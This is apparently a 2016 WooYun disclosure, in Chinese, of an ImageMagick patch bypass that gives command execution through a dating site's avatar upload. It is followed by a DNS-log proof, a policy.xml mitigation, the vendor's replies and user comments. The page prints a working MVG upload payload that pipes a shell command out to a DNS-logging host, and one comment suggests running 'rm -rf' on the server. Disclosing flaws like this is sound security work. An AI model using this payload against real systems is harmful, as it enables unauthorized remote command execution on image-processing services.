有缘网主站命令执行（ImageMagick补丁绕过）

主站头像上传处

参考：http://blog.knownsec.com/2016/05/imagemagick-popen-remote-command-execution-vulnerability/

上传图片

push graphic-context
 viewbox 0 0 640 480
 image Over 0,0 0,0 '|host XXX.xxx.dnslog.info'
 pop graphic-context

cloudeye 检测到请求

31-May-2016 14:24:43.165 queries: client 202.106.0.101#31926 (XXX.xxx.dnslog.info): query: XXX.xxx.dnslog.info IN A -EDC (128.199.200.236)
 31-May-2016 14:24:43.593 queries: client 202.106.0.109#37736 (XXX.xxx.dnslog.info): query: XXX.xxx.dnslog.info IN AAAA -EDC (128.199.200.236)
 31-May-2016 14:24:43.773 queries: client 202.106.0.101#42459 (XXX.xxx.dnslog.info): query: XXX.xxx.dnslog.info IN MX -EDC (128.199.200.236)

目前官方已经更新代码至 Gitlab，但最终修复版本还未发布，补丁细节可参考如下链接：

http://git.imagemagick.org/repos/ImageMagick/commit/40639d173aa8c76b850d625c630b711fee4dcfb

http://git.imagemagick.org/repos/ImageMagick/commit/4674b3e1ea87a69646a6dbac8772c45eeb20c9f0

防御

/etc/ImageMagick/policy.xml 文件中添加如下代码

<policy domain="path" rights="none" pattern="|*"/>

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-06-01 10:32

厂商回复：

大虾，你好，经我们验证此漏洞无法利用。另外，你漏洞证明上检测到的请求ip不是有缘网的。。wooyun的审核不严谨，并不存在该漏洞，请删除，避免造成不良影响。

漏洞Rank：15 (WooYun评价)

最新状态：

2016-06-01：白帽子提交的“cloudeye 检测到请求”的确不是有缘网的地址， 乌云审核第二次复测，， 希望乌云大神继续测！~

2016-06-01：经过测试cloudeye，由于dns解析过程，显示的不是我公司的地址，白帽子的确触发了漏洞，很抱歉带来的一些列误会，希望给白帽子发礼物，十分感谢。

1. 2016-05-31 15:41 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不，，不要误会，我不是针对谁，我是说在座...)

   0

   又要刷一波的节奏？

   1# 回复此人

2. 2016-05-31 16:30 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢，一生只够爱一个人。)

   0

   洞主去相亲吗

   2# 回复此人

3. 2016-06-01 10:46 | 李旭敏 ( 普通白帽子 | Rank:848 漏洞数:116 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

   0

   有缘网 主站上传的图片服务器说不是有缘自己的？ 还写着youyuan-idc.com?这脸疼不疼

   3# 回复此人

4. 2016-06-01 10:46 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

   0

   厂商水平有待提高啊

   4# 回复此人

5. 2016-06-01 10:54 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

   0

   @xsser 这种厂商建议直接封号得了！漏洞肯定被修复了啊！也是够逗的……

   5# 回复此人

6. 2016-06-01 10:55 | Busliv ( 普通白帽子 | Rank:256 漏洞数:27 | to be，and to be)

   0

   呵呵哒

   6# 回复此人

7. 2016-06-01 10:55 | 沧浪浪拔出保健 ( 普通白帽子 | Rank:289 漏洞数:27 | @互联网的那点事)

   0

   @hkAssassin 似乎还没修哎，真是为有缘的安全团队着急……

   7# 回复此人

8. 2016-06-01 11:24 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢，一生只够爱一个人。)

   0

   有缘还责怪wooyun 审核？ 这不是刺激白帽子刷有缘让运维人员下岗的节奏

   8# 回复此人

9. 2016-06-01 11:40 | Ton7BrEak ( 普通白帽子 | Rank:350 漏洞数:70 | ☁ 我要继续努力！)

   0

   你漏洞证明上检测到的请求ip不是有缘网的。哈哈哈哈，现在的厂商真搞笑·

   9# 回复此人

10. 2016-06-01 11:40 | 库日天 ( 路人 | Rank:18 漏洞数:9 )

    0

    有缘 竟然敢质疑乌云的审核? youyuan-idc.com 打脸啊

    10# 回复此人

11. 2016-06-01 11:43 | jackyu ( 路人 | Rank:28 漏洞数:18 | 世界上没有一个系统是绝对安全的，系统最大...)

    0

    @李旭敏 @爱偷懒的98 是不是挂个黑夜不就知道了，，是吧

    11# 回复此人

12. 2016-06-01 12:48 | 天朝城管 ( 普通白帽子 | Rank:136 漏洞数:39 | 不要等到命玩你的时候才开始玩命)

    1

    上去直接执行rm -rf 不就知道是不是他的服务器了

    12# 回复此人

13. 2016-06-01 13:03 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

    0

    @楼上的兄弟们 这就是有缘忽略的理由吧。。。已经忽略了。。。

    13# 回复此人

14. 2016-06-01 13:17 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢，一生只够爱一个人。)

    0

    @jackyu 网站被黑 by:XXX QQ:XXXXX 友情检测，并无恶意。

    14# 回复此人

15. 2016-06-01 13:29 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

    0

    @爱偷懒的98 ？？？？ 哪有这几个字？ 少年别这么做，会被查水表的啊。

    15# 回复此人

16. 2016-06-01 13:35 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢，一生只够爱一个人。)

    0

    @sysALong 怕啥。。你罩我！ 来关注？

    16# 回复此人

17. 2016-06-01 13:54 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

    0

    @爱偷懒的98 大哥，别介，我罩不住啊。。。

    17# 回复此人

18. 2016-06-01 14:26 | Sealin ( 路人 | Rank:1 漏洞数:1 | 彩笔一枚)

    0

    play face

    18# 回复此人

19. 2016-06-01 15:34 | niliu ( 核心白帽子 | Rank:1803 漏洞数:236 | 逆流而上)

    1

    厂商对安全挺重视的，点赞！

    19# 回复此人

20. 2016-06-01 15:55 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢，一生只够爱一个人。)

    0

    @niliu 你有礼物当然点赞了

    20# 回复此人

21. 2016-06-01 18:48 | longye ( 普通白帽子 | Rank:8 漏洞数:1 | null)

    0

    厂商能持续沟通，并且有错就改，这态度咋不行了。楼上几位憋乱开火哇

    21# 回复此人